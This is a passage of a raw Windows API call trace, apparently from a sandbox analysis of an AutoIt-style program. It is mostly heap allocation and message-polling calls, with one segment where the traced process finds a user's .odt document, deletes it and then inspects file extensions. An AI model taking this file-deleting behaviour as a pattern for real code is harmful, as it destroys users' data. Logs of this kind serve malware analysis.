wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.100] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0173.100] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.100] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.100] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.101] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.101] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.101] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0173.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.101] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.101] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.101] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.101] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt", lpFilePart=0x0) returned 0x43 [0173.102] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a766f40, ftCreationTime.dwHighDateTime=0x1d5ddc1, ftLastAccessTime.dwLowDateTime=0x40a7d2d0, ftLastAccessTime.dwHighDateTime=0x1d5db4e, ftLastWriteTime.dwLowDateTime=0xc87c040, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x9ec8, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="SSq5T5u.odt", cAlternateFileName="")) returned 0x90ae18 [0173.102] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\ssq5t5u.odt")) returned 1 [0173.104] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a766f40, ftCreationTime.dwHighDateTime=0x1d5ddc1, ftLastAccessTime.dwLowDateTime=0x40a7d2d0, ftLastAccessTime.dwHighDateTime=0x1d5db4e, ftLastWriteTime.dwLowDateTime=0xc87c040, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x9ec8, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="SSq5T5u.odt", cAlternateFileName="")) returned 0 [0173.104] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0173.105] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0173.107] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0173.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0173.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0173.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0173.108] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0173.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0173.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0173.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0173.108] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0173.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0173.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.110] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0173.110] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0173.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.111] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0173.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0173.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0173.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.112] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.112] 